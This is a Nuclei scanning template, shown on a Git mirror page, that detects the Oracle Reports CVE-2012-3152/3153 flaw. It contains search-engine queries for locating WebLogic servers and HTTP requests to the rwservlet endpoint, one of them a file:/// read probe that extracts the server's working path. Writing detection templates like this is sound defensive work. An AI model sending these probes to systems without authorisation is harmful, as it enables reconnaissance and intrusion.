daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2012/CVE-2012-3153.yaml

74 lines
2.5 KiB
YAML
Raw Blame History

id: CVE-2012-3153
info:
name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
author: Sid Ahmed MALAOUI @ Realistic Security
severity: medium
description: |
An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
vectors related to Report Server Component.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution.
remediation: |
Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
- https://www.exploit-db.com/exploits/31737
- https://www.oracle.com/security-alerts/cpuoct2012.html
- http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
- http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
cvss-score: 6.4
cve-id: CVE-2012-3153
cwe-id: NVD-CWE-noinfo
epss-score: 0.95986
epss-percentile: 0.99471
cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: oracle
product: fusion_middleware
shodan-query:
- http.title:"weblogic"
- http.html:"weblogic application server"
fofa-query:
- title="weblogic"
- body="weblogic application server"
google-query: intitle:"weblogic"
tags: cve,cve2012,oracle,rce,edb
http:
- method: GET
path:
- "{{BaseURL}}/reports/rwservlet/showenv"
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Reports Servlet")'
- type: dsl
dsl:
- '!contains(body_2, "<html")'
- '!contains(body_2, "<HTML")'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: windows_working_path
regex:
- ".?.?\\\\.*\\\\showenv"
- type: regex
name: linux_working_path
regex:
- "/.*/showenv"
# digest: 490a00463044022073b059f06469d58c867070e171a4533bb976f5775453e911a3c02a02e0f7648b0220210d93050cb989bbd9f6a41297ef913318659adb3a0fdb23d50c031072dd0ada:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink